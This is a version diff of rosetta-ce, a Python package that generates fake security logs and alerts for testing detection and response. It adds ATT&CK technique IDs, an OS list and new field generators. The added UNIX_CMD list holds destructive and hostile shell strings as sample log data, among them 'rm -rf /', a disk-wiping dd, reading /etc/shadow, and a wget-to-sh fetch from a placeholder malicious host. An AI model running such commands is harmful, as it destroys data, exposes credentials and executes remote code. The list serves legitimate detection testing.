rosetta-ce 1.6.7__tar.gz → 1.6.9__tar.gz

{rosetta_ce-1.6.7/rosetta_ce.egg-info → rosetta_ce-1.6.9}/PKG-INFO

@@ -1,6 +1,6 @@
 Metadata-Version: 2.1
 Name: rosetta-ce
-Version: 1.6.7
+Version: 1.6.9
 Summary: Rosetta is a Python package that can be used to fake security logs and alerts for testing different detection and response use cases.
 Home-page: https://github.com/ayman-m/rosetta
 Author: Ayman Mahmoud

rosetta_ce-1.6.9/rosetta/constants/attributes.py

@@ -0,0 +1,285 @@
+INCIDENTS_TYPES = [
+    'Malware', 'Phishing', 'Access Violation', 'Lateral Movement', 'Port Scan', 'Sql Injection', 'Brute Force',
+    'Control Avoidance', 'Rogue Device', 'Denial Of Service', 'Account Compromised'
+]
+SEVERITIES = ['Low', 'Medium', 'High', 'Critical']
+
+ATTACK_TECHNIQUES = [
+    "T1548",
+    "T1548.002",
+    "T1548.004",
+    "T1548.001",
+    "T1548.003",
+    "T1548.006",
+    "T1548.005",
+    "T1134",
+    "T1134.002",
+    "T1134.003",
+    "T1134.004",
+    "T1134.005",
+    "T1134.001",
+    "T1531",
+    "T1087",
+    "T1087.004",
+    "T1087.002",
+    "T1087.003",
+    "T1087.001",
+    "T1098",
+    "T1098.001",
+    "T1098.003",
+    "T1098.006",
+    "T1098.002",
+    "T1098.005",
+    "T1098.004",
+    "T1650",
+    "T1583",
+    "T1583.005",
+    "T1583.002",
+    "T1583.001",
+    "T1583.008",
+    "T1583.004",
+    "T1583.007",
+    "T1583.003",
+    "T1583.006",
+    "T1595",
+    "T1595.001",
+    "T1595.002",
+    "T1595.003",
+    "T1557",
+    "T1557.002",
+    "T1557.003",
+    "T1557.001",
+    "T1071",
+    "T1071.004",
+    "T1071.002",
+    "T1071.003",
+    "T1071.001",
+    "T1010",
+    "T1560",
+    "T1560.003",
+    "T1560.002",
+    "T1560.001",
+    "T1123",
+    "T1119",
+    "T1020",
+    "T1020.001",
+    "T1197",
+    "T1547",
+    "T1547.014",
+    "T1547.002",
+    "T1547.006",
+    "T1547.008",
+    "T1547.015",
+    "T1547.010",
+    "T1547.012",
+    "T1547.007",
+    "T1547.001",
+    "T1547.005",
+    "T1547.009",
+    "T1547.003",
+    "T1547.004",
+    "T1547.013",
+    "T1037",
+    "T1037.002",
+    "T1037.001",
+    "T1037.003",
+    "T1037.004",
+    "T1037.005",
+    "T1176",
+    "T1217",
+    "T1185",
+    "T1110",
+    "T1110.004",
+    "T1110.002",
+    "T1110.001",
+    "T1110.003",
+    "T1612",
+    "T1115",
+    "T1651",
+    "T1580",
+    "T1538",
+    "T1526",
+    "T1619",
+    "T1059",
+    "T1059.002",
+    "T1059.010",
+    "T1059.009",
+    "T1059.007",
+    "T1059.008",
+    "T1059.001",
+    "T1059.006",
+    "T1059.004",
+    "T1059.005",
+    "T1059.003",
+    "T1092",
+    "T1586",
+    "T1586.003",
+    "T1586.002",
+    "T1586.001",
+    "T1554",
+    "T1584",
+    "T1584.005",
+    "T1584.002",
+    "T1584.001",
+    "T1584.008",
+    "T1584.004",
+    "T1584.007",
+    "T1584.003",
+    "T1584.006",
+    "T1609",
+    "T1613",
+    "T1659",
+    "T1136",
+    "T1136.003",
+    "T1136.002",
+    "T1136.001",
+    "T1543",
+    "T1543.005",
+    "T1543.001",
+    "T1543.004",
+    "T1543.002",
+    "T1543.003",
+    "T1555",
+    "T1555.006",
+    "T1555.003",
+    "T1555.001",
+    "T1555.005",
+    "T1555.002",
+    "T1555.004",
+    "T1485",
+    "T1132",
+    "T1132.002",
+    "T1132.001",
+    "T1486",
+    "T1565",
+    "T1565.003",
+    "T1565.001",
+    "T1565.002",
+    "T1001",
+    "T1001.001",
+    "T1001.003",
+    "T1001.002",
+    "T1074",
+    "T1074.001",
+    "T1074.002",
+    "T1030",
+    "T1530",
+    "T1602",
+    "T1602.002",
+    "T1602.001",
+    "T1213",
+    "T1213.003",
+    "T1213.001",
+    "T1213.002",
+    "T1005",
+    "T1039",
+    "T1025",
+    "T1622",
+    "T1491",
+    "T1491.002",
+    "T1491.001",
+    "T1140",
+    "T1610",
+    "T1587",
+    "T1587.002",
+    "T1587.003",
+    "T1587.004",
+    "T1587.001",
+    "T1652",
+    "T1006",
+    "T1561",
+    "T1561.001",
+    "T1561.002",
+    "T1482",
+    "T1484",
+    "T1484.001",
+    "T1484.002",
+    "T1189",
+    "T1568",
+    "T1568.003",
+    "T1568.002",
+    "T1568.001",
+    "T1114",
+    "T1114.003",
+    "T1114.001",
+    "T1114.002",
+    "T1573",
+    "T1573.002",
+    "T1573.001",
+    "T1499",
+    "T1499.003",
+    "T1499.004",
+    "T1499.001",
+    "T1499.002",
+    "T1611",
+    "T1585",
+    "T1585.003",
+    "T1585.002",
+    "T1585.001",
+    "T1546",
+    "T1546.008",
+    "T1546.009",
+    "T1546.010",
+    "T1546.011",
+    "T1546.001",
+    "T1546.015",
+    "T1546.014",
+    "T1546.012",
+    "T1546.016",
+    "T1546.006",
+    "T1546.007",
+    "T1546.013",
+    "T1546.002",
+    "T1546.005",
+    "T1546.004",
+    "T1546.003",
+    "T1480",
+    "T1480.001",
+    "T1048",
+    "T1048.002",
+    "T1048.001",
+    "T1048.003",
+    "T1041",
+    "T1011",
+    "T1011.001",
+    "T1052",
+    "T1052.001",
+    "T1567",
+    "T1567.004",
+    "T1567.002",
+    "T1567.001",
+    "T1567.003",
+    "T1190",
+    "T1203",
+    "T1212",
+    "T1211",
+    "T1068",
+    "T1210",
+    "T1133",
+    "T1008",
+    "T1083",
+    "T1222",
+    "T1222.002",
+    "T1222.001",
+    "T1657",
+    "T1495",
+    "T1187",
+    "T1606",
+    "T1606.002",
+    "T1606.001",
+    "T1592",
+    "T1592.004",
+    "T1592.003",
+    "T1592.001",
+    "T1592.002",
+    "T1589",
+    "T1589.001",
+    "T1589.002",
+    "T1589.003",
+    "T1590",
+    "T1590.002",
+    "T1590.001",
+    "T1590.005",
+    "T1590.006",
+    "T1590"
+]

{rosetta_ce-1.6.7 → rosetta_ce-1.6.9}/rosetta/constants/systems.py

@@ -1,3 +1,45 @@
+OS_LIST = [
+    "AIX 7.2",
+    "HP-UX 11i v3",
+    "Solaris 11",
+    "FreeBSD 13.2",
+    "OpenBSD 7.4",
+    "NetBSD 10.0",
+    "Ubuntu 22.04 LTS",
+    "Red Hat Enterprise Linux 9",
+    "CentOS 8",
+    "Debian 12",
+    "Fedora 38",
+    "Arch Linux 2024.09",
+    "Kali Linux 2024.1",
+    "Alpine Linux 3.18",
+    "SUSE Linux Enterprise Server 15 SP4",
+    "Windows 10 Pro",
+    "Windows 11 Home",
+    "Windows Server 2019",
+    "Windows Server 2022",
+    "Windows 8.1",
+    "Windows 7 SP1",
+    "macOS Ventura 13",
+    "macOS Monterey 12",
+    "macOS Big Sur 11",
+    "macOS Catalina 10.15",
+    "macOS Mojave 10.14",
+    "iOS 17",
+    "iPadOS 17",
+    "Android 14",
+    "HarmonyOS 3.1"
+]
+UNIX_CMD = [
+    "cat /etc/shadow",
+    "dd if=/dev/zero of=/dev/sda",
+    "rm -rf /",
+    "find / -name '*.log' -exec rm -f {} \\;",
+    "wget -O- http://malicious.example.com/malware | sh",
+    "iptables -F",
+    "chmod -R 777 /",
+    "chown -R nobody:nogroup /"
+]
 UNIX_CMD = [
     "cat /etc/shadow",
     "dd if=/dev/zero of=/dev/sda",
@@ -80,7 +122,7 @@ WIN_EVENTS = [
     '<Data Name="ProcessName">{process_name}</Data><Data Name="ProcessId">{process_id}</Data>'
     '<Data Name="DestinationLogonId">{destination_login_id}</Data>'
     '<Data Name="SourceNetworkAddress">{source_network_address}</Data>'
-    '<Data Name="SourcePort">{source_port}</Data><Data Name="LogonGuid">{guid}</Data>'
+    '<Data Name="SourcePort">{local_port}</Data><Data Name="LogonGuid">{guid}</Data>'
     '<Data Name="TransmittedServices">{transmitted_services}</Data></EventData></Event>',
     '<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">'
     '<System><Provider Name="Microsoft-Windows-Security-Auditing" Guid="{guid}"/>'

{rosetta_ce-1.6.7 → rosetta_ce-1.6.9}/rosetta/rfaker.py

@@ -12,8 +12,8 @@ from datetime import datetime, timedelta
 from typing import Optional, List
 from rosetta.constants.sources import BAD_IP_SOURCES, GOOD_IP_SOURCES, BAD_URL_SOURCES, GOOD_URL_SOURCES, \
     BAD_SHA256_SOURCES, GOOD_SHA256_SOURCES, CVE_SOURCES, TERMS_SOURCES
-from rosetta.constants.systems import UNIX_CMD, WINDOWS_CMD, WIN_PROCESSES, WIN_EVENTS
-from rosetta.constants.attributes import INCIDENTS_TYPES, SEVERITIES
+from rosetta.constants.systems import OS_LIST, UNIX_CMD, WINDOWS_CMD, WIN_PROCESSES, WIN_EVENTS
+from rosetta.constants.attributes import INCIDENTS_TYPES, SEVERITIES, ATTACK_TECHNIQUES
 from rosetta.constants.sensors import ACTIONS, PROTOCOLS, TECHNIQUES, ERROR_CODE
 from rosetta.constants.db import QUERY_TYPE, DATABASE_NAME, QUERY
 
@@ -37,7 +37,7 @@ class Observables:
                 dst_host: Optional[list] = None, src_domain: Optional[list] = None, dst_domain: Optional[list] = None,
                 sender_email: Optional[list] = None, recipient_email: Optional[list] = None,
                 email_subject: Optional[list] = None, email_body: Optional[list] = None,
-                url: Optional[list] = None, source_port: Optional[list] = None, remote_port: Optional[list] = None,
+                url: Optional[list] = None, local_port: Optional[list] = None, remote_port: Optional[list] = None,
                 protocol: Optional[list] = None, inbound_bytes: Optional[list] = None,
                 outbound_bytes: Optional[list] = None, app: Optional[list] = None, os: Optional[list] = None,
                 user: Optional[list] = None, cve: Optional[list] = None, file_name: Optional[list] = None,
@@ -63,7 +63,7 @@ class Observables:
         self.email_subject = email_subject
         self.email_body = email_body
         self.url = url
-        self.source_port = source_port
+        self.local_port = local_port
         self.remote_port = remote_port
         self.protocol = protocol
         self.inbound_bytes = inbound_bytes
@@ -316,6 +316,30 @@ class Events:
         if field == "unix_cmd":
             field_value = random.choice(observables.unix_cmd) if observables and observables.unix_cmd \
                 else random.choice(UNIX_CMD)
+        if field == "technique":
+            field_value = random.choice(observables.technique) if observables and observables.technique \
+                else random.choice(ATTACK_TECHNIQUES)
+        if field == "entry_type":
+            field_value = random.choice(observables.entry_type) if observables and observables.entry_type \
+                else faker.sentence(nb_words=2)
+        if field == "sensor":
+            field_value = random.choice(observables.sensor) if observables and observables.sensor \
+                else faker.sentence(nb_words=1)
+        if field == "event_id":
+            field_value = random.choice(observables.event_id) if observables and observables.event_id \
+                else faker.random_int(min=10, max=1073741824)       
+        if field == "error_code":
+            field_value = random.choice(observables.error_code) if observables and observables.error_code \
+                else faker.random_int(min=1000, max=5000)  
+        if field == "terms":
+            field_value = random.choice(observables.terms) if observables and observables.terms \
+                else faker.sentence(nb_words=10)
+        if field == "alert_types":
+            field_value = random.choice(observables.alert_types) if observables and observables.alert_types \
+                else faker.sentence(nb_words=1)
+        if field == "action_status":
+            field_value = random.choice(observables.action_status) if observables and observables.action_status \
+                else random.choice(ACTIONS)
         if field == "severity":
             field_value = random.choice(observables.severity) if observables and observables.severity \
                 else random.choice(SEVERITIES)
@@ -327,6 +351,12 @@ class Events:
         if field == "remote_ip":
             field_value = random.choice(observables.remote_ip) if observables and observables.remote_ip \
                     else Observables.generator(observable_type=ObservableType.IP, known=ObservableKnown.BAD, count=1)[0]
+        if field == "local_ip_v6":
+            field_value = random.choice(observables.local_ip_v6) if observables and observables.local_ip_v6 \
+                    else faker.ipv6()
+        if field == "remote_ip_v6":
+            field_value = random.choice(observables.remote_ip_v6) if observables and observables.remote_ip_v6 \
+                    else faker.ipv6()            
         if field == "remote_port":
             field_value = random.choice(observables.remote_port) if observables and observables.remote_port \
                     else faker.random_int(min=1024, max=65535)
@@ -339,6 +369,12 @@ class Events:
         if field == "outbound_bytes":
             field_value = random.choice(observables.outbound_bytes) if observables and observables.outbound_bytes \
                     else faker.random_int(min=10, max=1073741824)
+        if field == "app":
+            field_value = random.choice(observables.app) if observables and observables.app \
+                    else faker.sentence(nb_words=2)
+        if field == "os":
+            field_value = random.choice(observables.os) if observables and observables.os \
+                    else random.choice(OS_LIST)
         if field == "protocol":
             field_value = random.choice(observables.protocol) if observables and observables.protocol \
                     else random.choice(PROTOCOLS)
@@ -351,6 +387,9 @@ class Events:
         if field == "src_domain":
             field_value = random.choice(observables.src_domain) if observables and observables.src_domain \
                     else faker.domain_name()
+        if field == "dst_domain":
+            field_value = random.choice(observables.dst_domain) if observables and observables.dst_domain \
+                    else faker.domain_name()
         if field == "sender_email":
             field_value = random.choice(observables.sender_email) if observables and observables.sender_email \
                     else faker.email()
@@ -428,7 +467,7 @@ class Events:
         if field == "file_name":
             field_value = random.choice(observables.file_name) if observables and observables.file_name \
                 else faker.file_name()
-        if field == "cve_id":
+        if field == "cve":
             field_value = random.choice(observables.cve) if observables and observables.cve \
                     else Observables.generator(observable_type=ObservableType.CVE, count=1)
         if field == "file_hash":
@@ -692,7 +731,7 @@ class Events:
                                                  domain_name=domain_name, subject_login_id=subject_login_id,
                                                  privilege_list=privilege_list, cmd=cmd,
                                                  destination_login_id=destination_login_id,
-                                                 source_network_address=source_network_address, source_port=local_port,
+                                                 source_network_address=source_network_address, local_port=local_port,
                                                  transmitted_services=transmitted_services, file_name=file_name)
             winevent_messages.append(win_event)
         return winevent_messages

{rosetta_ce-1.6.7 → rosetta_ce-1.6.9/rosetta_ce.egg-info}/PKG-INFO

@@ -1,6 +1,6 @@
 Metadata-Version: 2.1
 Name: rosetta-ce
-Version: 1.6.7
+Version: 1.6.9
 Summary: Rosetta is a Python package that can be used to fake security logs and alerts for testing different detection and response use cases.
 Home-page: https://github.com/ayman-m/rosetta
 Author: Ayman Mahmoud

{rosetta_ce-1.6.7 → rosetta_ce-1.6.9}/setup.py

@@ -5,7 +5,7 @@ with open("README.md", "r") as fh:
 
 setuptools.setup(
     name="rosetta-ce",
-    version="1.6.7",
+    version="1.6.9",
     author="Ayman Mahmoud",
     author_email="content@ayman.online",
     description="Rosetta is a Python package that can be used to fake security logs and alerts for testing different "

rosetta_ce-1.6.7/rosetta/constants/attributes.py

@@ -1,5 +0,0 @@
-INCIDENTS_TYPES = [
-    'Malware', 'Phishing', 'Access Violation', 'Lateral Movement', 'Port Scan', 'Sql Injection', 'Brute Force',
-    'Control Avoidance', 'Rogue Device', 'Denial Of Service', 'Account Compromised'
-]
-SEVERITIES = ['Low', 'Medium', 'High', 'Critical']